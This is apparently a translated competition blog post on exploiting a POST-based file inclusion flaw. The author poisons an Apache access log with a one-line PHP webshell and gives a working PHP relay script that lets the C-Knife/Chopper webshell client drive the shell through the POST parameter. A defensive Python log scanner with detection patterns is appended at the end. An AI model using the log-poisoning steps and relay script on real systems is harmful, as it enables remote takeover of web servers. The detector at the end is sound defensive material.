Recently, while busy with a competition, I encountered a file inclusion vulnerability. I wrote a one-sentence Trojan into the Apache access.log, included the log, and connected with C-Knife. The GET type is very easy: point the tool directly at http://xxx/FilesIn.php?filename=../apache/logs/access.log and the log is included. But what about a file inclusion vulnerability where the filename has to be sent by POST?
The method above is completely ineffective there. Neither Chopper itself nor C-Knife has a configuration option for extra POST parameters, so is such a good vulnerability simply wasted? Borrowing the approach used earlier for cookie injection, I wrote a simple script (using C-Knife as the example).
First, write the one-sentence Trojan into the log.
Then check on the target machine to see whether it was written successfully.
OK.
Create the following script:

    <?php
    // Local relay: forwards C-Knife's POST parameters to the including page and
    // adds the filename parameter that C-Knife cannot send by itself.
    // The start of the script is cut off in the source; the URL below is assumed
    // from the example above.
    $url = 'http://xxx/FilesIn.php';
    $data = array('filename' => '../apache/logs/access.log');
    if (isset($_POST["croot"])) // change croot to your password
    {
        $tmp = array('croot' => $_POST["croot"]); // change croot to your password
        $data += $tmp;
    }
    if (isset($_POST["action"])) {
        $tmp = array('action' => $_POST["action"]);
        $data += $tmp;
    }
    if (isset($_POST["z1"])) {
        $tmp = array('z1' => $_POST["z1"]);
        $data += $tmp;
    }
    // Leftover debugging lines, kept commented out ($postdata is never defined):
    //$data = array('filename' => '../apache/logs/access.log', 'croot' => $postdata, 'action' => $_POST['action'], 'z1' => $_POST['z1']);
    //var_dump($data);
    $data = http_build_query($data);
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
    $rtdata = curl_exec($curl);
    curl_close($curl);
    echo $rtdata;
    ?>

Open C-Knife.
Set up a local PHP server running the script and connect C-Knife to it. Test the result.
OK. This script only relays the PHP file management traffic; other management functions may not be well supported.
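
On the defending side, the POST variant leaves no included path in the access log, so what remains visible is the poisoning request itself and the later POSTs from the same client. The following scan of Apache combined-format log lines is an added example, not part of the original post; the sample lines are constructed and the rule names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format; quoted fields may hold backslash-escaped quotes.
Q = r'"((?:[^"\\]|\\.)*)"'
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] ' + Q + r' (\d{3}) \S+(?: ' + Q + ' ' + Q + ')?')
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)  # PHP open tag written into a logged field
LOG_INCLUDE = re.compile(r'=[^&\s]*(?:\.\./|\.\.\\)[^&\s]*\.log\b', re.I)  # traversal to a .log file

# Constructed sample lines (documentation IP ranges, harmless placeholder body).
SAMPLE = [
    '198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "GET /<?php PLACEHOLDER ?> HTTP/1.1" 404 196 "-" "-"',
    '203.0.113.9 - - [10/Mar/2024:10:00:09 +0000] "GET /FilesIn.php?filename=../apache/logs/access.log HTTP/1.1" 200 4096 "-" "-"',
    '203.0.113.9 - - [10/Mar/2024:10:00:12 +0000] "POST /FilesIn.php HTTP/1.1" 200 4096 "-" "-"',
    '198.51.100.7 - - [10/Mar/2024:10:00:20 +0000] "POST /login.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return (line_number, rule, client) for each suspicious log line."""
    findings = []
    poisoners = set()  # clients that already wrote a PHP tag into the log
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue
        host, request, _status, referer, agent = m.groups()
        fields = [request, referer or "", agent or ""]
        decoded = [unquote_plus(f) for f in fields]
        if any(PHP_TAG.search(f) for f in fields + decoded):
            poisoners.add(host)
            findings.append((n, "php-tag-in-logged-field", host))
        elif LOG_INCLUDE.search(decoded[0]):
            # Only the GET variant exposes the included path in the log.
            findings.append((n, "log-path-in-query", host))
        elif request.startswith("POST ") and host in poisoners:
            # POST variant: the body is not logged, so correlate by client.
            findings.append((n, "post-after-poisoning", host))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```
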